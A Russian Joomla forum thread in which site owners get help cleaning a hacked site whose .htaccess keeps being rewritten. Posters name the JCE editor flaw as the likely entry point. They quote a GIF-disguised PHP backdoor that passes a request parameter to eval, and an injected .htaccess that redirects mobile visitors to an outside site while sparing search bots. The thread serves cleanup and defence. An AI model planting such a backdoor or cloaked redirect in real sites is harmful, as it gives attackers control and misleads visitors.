Зловредный код переписывает .htaccess. Помогите отловить.

Samovar

Осваиваюсь на форуме
10
0 / 0

Зловредный код переписывает .htaccess. Помогите отловить.

« : 24.08.2012, 19:15:30 »

Сайт редиректет на какой то непонятный сайт. При попытке изменять htaccess он возвращается в исходное состояние.
В бан Google попал, с яху тоже редирект. Нахожусь в полной панике.

Лог:

Спойлер

[свернуть]

.htaccess

Спойлер

[свернуть]

« Последнее редактирование: 24.08.2012, 19:22:46 от Samovar »

Записан

wishlight

Гуру
5074
319 / 1
От 300 руб быстрый хостинг. Сервера.

Re: Зловредный код переписывает .htaccess. Помогите отловить.

« Ответ #1 : 24.08.2012, 19:26:07 »

Могу глянуть. Шеллов не вижу в fls. kickstart.php - он что тут делает? Логи доступа есть?

Записан

Дедик, VDS, бекап по смешным ценам|Мои VDS быстрее твоих|Надежные VDS(скидка 10% ovz WPCLMX6YWG kvm 7SIHW75O9Q)|Хостинг против взломов|Решаю ваши проблемы.
Лечу от вирусов и хостинг
Защита сайтов и логи взломов

Samovar

Осваиваюсь на форуме
10
0 / 0

Re: Зловредный код переписывает .htaccess. Помогите отловить.

« Ответ #2 : 24.08.2012, 19:28:35 »

Буду очень рад помощи, что для этого надо? Пароль на ftp? kikstart это я пытался с бекапа восстановиться.

« Последнее редактирование: 24.08.2012, 19:35:35 от Samovar »

Записан

wishlight

Гуру
5074
319 / 1
От 300 руб быстрый хостинг. Сервера.

Re: Зловредный код переписывает .htaccess. Помогите отловить.

« Ответ #3 : 24.08.2012, 19:30:15 »

Только не сюда. Желательно в icq или skype, для того чтобы в процессе мог вопросы задавать.

Записан

Дедик, VDS, бекап по смешным ценам|Мои VDS быстрее твоих|Надежные VDS(скидка 10% ovz WPCLMX6YWG kvm 7SIHW75O9Q)|Хостинг против взломов|Решаю ваши проблемы.
Лечу от вирусов и хостинг
Защита сайтов и логи взломов

Samovar

Осваиваюсь на форуме
10
0 / 0

Re: Зловредный код переписывает .htaccess. Помогите отловить.

« Ответ #4 : 24.08.2012, 19:37:24 »

хорошо. минут через 30 напишу в аску. до дома доберусь.

Записан

draff

Гуру
5801
434 / 7
ищу работу

Re: Зловредный код переписывает .htaccess. Помогите отловить.

« Ответ #5 : 25.08.2012, 10:18:18 »

Цитата: Samovar от 24.08.2012, 19:15:30

При попытке изменять htaccess он возвращается в исходное состояние.

Хм,а права на файл 644 и права на файл можно изменить?

Записан

Удалю вирус с сайта. Обновление Joomla!, JoomShopping, Virtuemart Интеграция Retailcrm | Отзывы

Samovar

Осваиваюсь на форуме
10
0 / 0

Re: Зловредный код переписывает .htaccess. Помогите отловить.

« Ответ #6 : 26.08.2012, 12:31:52 »

Ничего не помогало, был зловредный вирус, сейчас вроде поправили. Растолкуйте в краце что он делает пожалуйста.

Вот как выглядел один файл - story.php

Спойлер

[свернуть]

Другой к которому он обращался:

Спойлер

[свернуть]

Записан

flyingspook

Moderator
3590
247 / 9

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #7 : 26.08.2012, 16:56:58 »

растолковываю
1 файл это загрузчик shell или удаленное использование такового
(но story.php не обращается к тому файлу ему это не зачем)
2 файл после строк

Цитировать

/**
* Utility class for the submenu
*
* @package Joomla
*/

сам shell который уже вписали в файл вам

« Последнее редактирование: 23.12.2012, 10:37:46 от flyingspook »

Записан

ЛЕЧИМ САЙТЫ ОТ ВИРУСОВ и Shell! & НОВЫЙ СКАНЕР ПОИСКА Shell and BackDoor
Сканер поиска Shell and BackDoor
Отличный хостинг для Ваших сайтов. Настраиваем сервера.

deil

Новичок
2
0 / 0

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #8 : 23.12.2012, 07:52:58 »

Аналогичная ситуация у меня. В папке stories два лишних файла .cache_geyze3.php и story.php такого же содержания. Заражаются все файлы с расширением js .
Восстанавливаю сайт из бекапа с удалением этих двух файлов с сменой пароля FTP. Скажите это поможет?

Записан

flyingspook

Moderator
3590
247 / 9

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #9 : 23.12.2012, 10:40:51 »

Цитата: deil от 23.12.2012, 07:52:58

Аналогичная ситуация у меня. В папке stories два лишних файла .cache_geyze3.php и story.php такого же содержания. Заражаются все файлы с расширением js .
Восстанавливаю сайт из бекапа с удалением этих двух файлов с сменой пароля FTP. Скажите это поможет?

если бэкап чистый то поможет
если нет то только если найдете все бакдоры и удалите то поможет
в бекаре могут быть уже и другие

Записан

ЛЕЧИМ САЙТЫ ОТ ВИРУСОВ и Shell! & НОВЫЙ СКАНЕР ПОИСКА Shell and BackDoor
Сканер поиска Shell and BackDoor
Отличный хостинг для Ваших сайтов. Настраиваем сервера.

deil

Новичок
2
0 / 0

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #10 : 23.12.2012, 16:06:21 »

Загрузил сохраненную копию сайта 2-х месячной давности прошло уже 7 часов пока все норм. На компе каспер выловил троян Trojan.Script.Generic На хостинге находился еще сайт на Wordpressе так же js файлы оказались зараженными

Записан

inspire

Осваиваюсь на форуме
36
0 / 0

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #11 : 27.12.2012, 11:44:10 »

Други у меня похоже такая же ситуевина с сайтом, кто поможет за адекватную плату вылечить сайтик?

Записан

MAzZY

Захожу иногда
93
5 / 0

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #12 : 15.01.2013, 17:47:35 »

Кто-нибудь смог выяснить, каким образом залили первоначальный story.php?

Записан

evgen777

Давно я тут
657
62 / 2

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #13 : 15.01.2013, 18:08:01 »

заливают вероятно через уязвимость JCE

Записан

Разработка, доработка расширений для Joomla!

MAzZY

Захожу иногда
93
5 / 0

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #14 : 15.01.2013, 18:25:28 »

Для этого нужно иметь пользовательский аккаунт? Какая версия уязвима?

Записан

evgen777

Давно я тут
657
62 / 2

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #15 : 15.01.2013, 18:38:29 »

1) не обязательно
2) любая версия ниже 2.1
по теме
http://www.securitylab.ru/vulnerability/424641.php

Записан

Разработка, доработка расширений для Joomla!

MAzZY

Захожу иногда
93
5 / 0

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #16 : 15.01.2013, 18:57:35 »

Речь о версии Joomla 1.5.х.
Для неё тоже актуально?

Записан

evgen777

Давно я тут
657
62 / 2

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #17 : 15.01.2013, 19:03:23 »

да. 1,5 это устаревшая версия.

Записан

Разработка, доработка расширений для Joomla!

flyingspook

Moderator
3590
247 / 9

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #18 : 15.01.2013, 20:12:19 »

Цитировать

Кто-нибудь смог выяснить, каким образом залили первоначальный story.php?

@MAzZY
вы что ломать собрались

заливается файл story.gif переименовывается story.php с помощью него заливается shell через который все и выполняется

Записан

ЛЕЧИМ САЙТЫ ОТ ВИРУСОВ и Shell! & НОВЫЙ СКАНЕР ПОИСКА Shell and BackDoor
Сканер поиска Shell and BackDoor
Отличный хостинг для Ваших сайтов. Настраиваем сервера.

Web_Studio_MAX

Захожу иногда
105
0 / 0

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #19 : 17.01.2013, 00:17:21 »

у меня тоже сидел такой файлик, даже два story.gif и story.php
с таким кодом

Код

GIF89a1
<?php 
if (isset($_REQUEST['p1'])) {
	eval(stripslashes($_REQUEST['p1']));
} else {
	echo "djeu84m";
}
?>

Народ как защититься? Где дыра. через которую они лезут?

Записан

flyingspook

Moderator
3590
247 / 9

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #20 : 17.01.2013, 09:17:32 »

Цитировать

Народ как защититься? Где дыра. через которую они лезут?

JCE редактор
Nonumber менеджер

Записан

ЛЕЧИМ САЙТЫ ОТ ВИРУСОВ и Shell! & НОВЫЙ СКАНЕР ПОИСКА Shell and BackDoor
Сканер поиска Shell and BackDoor
Отличный хостинг для Ваших сайтов. Настраиваем сервера.

Web_Studio_MAX

Захожу иногда
105
0 / 0

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #21 : 17.01.2013, 12:16:52 »

Цитата: flyingspook от 17.01.2013, 09:17:32

JCE редактор
Nonumber менеджер

Сейчас стоит JCE 1.5.7, если я переустановлю на последнюю версию JCE 2.3.1 - это поможет?
Что за Nonumber менеджер?

Цитата: Niktus от 17.01.2013, 09:48:08

зараженый код весь после preg_replace("...

функция preg_replace — Выполняет поиск и
замену по регулярному выражению

Это в каком-то файле?

Записан

flyingspook

Moderator
3590
247 / 9

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #22 : 17.01.2013, 15:16:28 »

Цитировать

Сейчас стоит JCE 1.5.7, если я переустановлю на последнюю версию JCE 2.3.1 - это поможет?

поможет ровно до того дня пока в нем не найдут очередную дыру

Записан

ЛЕЧИМ САЙТЫ ОТ ВИРУСОВ и Shell! & НОВЫЙ СКАНЕР ПОИСКА Shell and BackDoor
Сканер поиска Shell and BackDoor
Отличный хостинг для Ваших сайтов. Настраиваем сервера.

Web_Studio_MAX

Захожу иногда
105
0 / 0

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #23 : 22.01.2013, 00:27:47 »

Только разобрался с J1.5? как теперь на сайте с J2.5.7 и VirueMart 2.0.14 засран .htaccess

Вот что выдал fls.php:

Код

File: www/public_html/plugins/vmpayment/heidelpay/heidelpay/heidelpay_response.php
String:: $_POST[

File: www/public_html/components/com_mailto/controller.php
String:: $_POST[

File: www/public_html/components/com_virtuemart/controllers/cart.php
String:: confirm(

File: www/public_html/components/com_users/controllers/reset.php
String:: confirm(

File: www/public_html/libraries/joomla/html/toolbar/button/confirm.php
String:: confirm(

File: www/public_html/libraries/joomla/environment/request.php
String:: $_POST[

File: www/public_html/libraries/tcpdf/pdf417.php
String:: c99

File: www/public_html/libraries/tcpdf/tcpdf.php
String:: c100

File: www/public_html/administrator/templates/hathor/html/com_menus/menus/default.php
String:: confirm(

File: www/public_html/administrator/templates/hathor/html/com_finder/maps/default.php
String:: confirm(

File: www/public_html/administrator/templates/hathor/html/com_finder/index/default.php
String:: confirm(

File: www/public_html/administrator/templates/hathor/html/com_finder/filters/default.php
String:: confirm(

File: www/public_html/administrator/templates/hathor/html/com_users/groups/default.php
String:: confirm(

File: www/public_html/administrator/components/com_joomlaupdate/restore.php
String:: $_POST[

File: www/public_html/administrator/components/com_virtuemart/views/updatesmigration/tmpl/default_tools.php
String:: confirm(

File: www/public_html/administrator/components/com_virtuemart/views/orders/tmpl/order.php
String:: confirm(

File: www/public_html/administrator/components/com_virtuemart_allinone/admin.virtuemart_allinone.php
String:: confirm(

File: www/public_html/administrator/components/com_akeeba/views/postsetup/tmpl/default.php
String:: confirm(

File: www/public_html/administrator/components/com_akeeba/views/buadmin/view.html.php
String:: confirm(

File: www/public_html/administrator/components/com_menus/views/menus/tmpl/default.php
String:: confirm(

File: www/public_html/administrator/components/com_chronoforms/versions/j2.5/admin.chronoforms.php
String:: $_POST[

File: www/public_html/administrator/components/com_chronoforms/versions/j1.6/admin.chronoforms.php
String:: $_POST[

File: www/public_html/administrator/components/com_chronoforms/versions/j1.5/admin.chronoforms.php
String:: $_POST[

File: www/public_html/administrator/components/com_chronoforms/versions/j1.7/admin.chronoforms.php
String:: $_POST[

File: www/public_html/administrator/components/com_chronoforms/controller.php
String:: $_POST[

File: www/public_html/administrator/components/com_chronoforms/form_actions/check_captcha/check_captcha.php
String:: $_POST[

File: www/public_html/administrator/components/com_chronoforms/form_actions/paypal_listener/paypal_listener.php
String:: $_POST[

File: www/public_html/administrator/components/com_chronoforms/form_actions/confirmation_page/confirmation_page.php
String:: $_POST[

File: www/public_html/administrator/components/com_chronoforms/form_actions/confirmation_page/cfaction_confirmation_page.php
String:: $_POST[

File: www/public_html/administrator/components/com_chronoforms/views/show_data.php
String:: $_POST[

File: www/public_html/administrator/components/com_chronoforms/views/index.php
String:: confirm(

File: www/public_html/administrator/components/com_chronoforms/views/list_data.php
String:: $_POST[

File: www/public_html/administrator/components/com_chronoforms/toolbar.chronoforms.html.php
String:: $_POST[

File: www/public_html/administrator/components/com_finder/views/maps/tmpl/default.php
String:: confirm(

File: www/public_html/administrator/components/com_finder/views/index/tmpl/default.php
String:: confirm(

File: www/public_html/administrator/components/com_finder/views/filters/tmpl/default.php
String:: confirm(

File: www/public_html/administrator/components/com_users/views/groups/tmpl/default.php
String:: confirm(

File: www/public_html/administrator/components/com_admintools/restore.php
String:: $_POST[

File: www/public_html/administrator/components/com_admintools/views/cpanel/tmpl/default.php
String:: confirm(

Done

Записан

evgen777

Давно я тут
657
62 / 2

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #24 : 22.01.2013, 02:01:28 »

Цитата: Web_Studio_MAX от 22.01.2013, 00:27:47

Код

File: www/public_html/libraries/tcpdf/pdf417.php
String:: c99
File: www/public_html/libraries/tcpdf/tcpdf.php
String:: c100

удалить немедленно... это шеллы

Записан

Разработка, доработка расширений для Joomla!

Apple_Buy

Захожу иногда
71
1 / 0
Истина всегда рядом....

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #25 : 22.01.2013, 06:04:13 »

Цитата: evgen777 от 22.01.2013, 02:01:28

удалить немедленно... это шеллы

Это не шеллы, это стандартные файлы дистрибутива VirtueMart, можете сами скачать с сайта производителя и посмотреть, сканер так же будет на них ругаться.

Записан

evgen777

Давно я тут
657
62 / 2

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #26 : 22.01.2013, 12:42:12 »

Сами файлы содержат код шелла...
Тогда заменить оригинальными

Записан

Разработка, доработка расширений для Joomla!

wishlight

Гуру
5074
319 / 1
От 300 руб быстрый хостинг. Сервера.

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #27 : 22.01.2013, 12:47:34 »

Код в студию...

Записан

Дедик, VDS, бекап по смешным ценам|Мои VDS быстрее твоих|Надежные VDS(скидка 10% ovz WPCLMX6YWG kvm 7SIHW75O9Q)|Хостинг против взломов|Решаю ваши проблемы.
Лечу от вирусов и хостинг
Защита сайтов и логи взломов

Apple_Buy

Захожу иногда
71
1 / 0
Истина всегда рядом....

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #28 : 22.01.2013, 13:29:05 »

Цитата: evgen777 от 22.01.2013, 12:42:12

Сами файлы содержат код шелла...
Тогда заменить оригинальными

Замена файлов не даст результата, сканер будет показывать такой же результат, это было мной проверенно, файлы абсолютно идентичны. Ниже прикрепил оригинальные файлы VirtueMart 2.0.18a (stable) с сайта производителя.

[вложение удалено Администратором]

Записан

Web_Studio_MAX

Захожу иногда
105
0 / 0

Re: Зловредный код переписывает.htaccess. отловить

« Ответ #29 : 22.01.2013, 13:38:43 »

Не могу вставить в сообщение код этих файлов, наверное из-за большого размера кода, по-этому прикрепляю

А это код .htaccess:

Код

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} WAP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipod [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPod [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Moby [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Mobi [NC,OR]
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://dietrussia.ru/ [L,R=302]

[вложение удалено Администратором]

Записан

Добавилась Запись в.htaccess Автор Roki37	Ответов: 9 Просмотров: 1838	06.02.2019, 11:59:07 от Roki37
htaccess Автор SolopoV	Ответов: 32 Просмотров: 2496	30.10.2017, 22:18:16 от SolopoV
cайт рассылает спам, помогите Автор Vergi	Ответов: 7 Просмотров: 2674	08.10.2017, 18:56:54 от wishlight
Помогите проанализировать отчет АйБолит Автор dm-krv	Ответов: 8 Просмотров: 1124	10.09.2017, 14:31:10 от winstrool
Помогите вылечить сайт от вирусов Автор Victor333	Ответов: 26 Просмотров: 1982	15.06.2017, 18:35:15 от Миха1211

Совет по Joomla: использовать выключенное состояние для кнопок в списках элементов админки

Онлайн-трансляции Joomla-разработки Игоря Бердичевского

20 лет Joomla: Ринат Кажетов

Похожие темы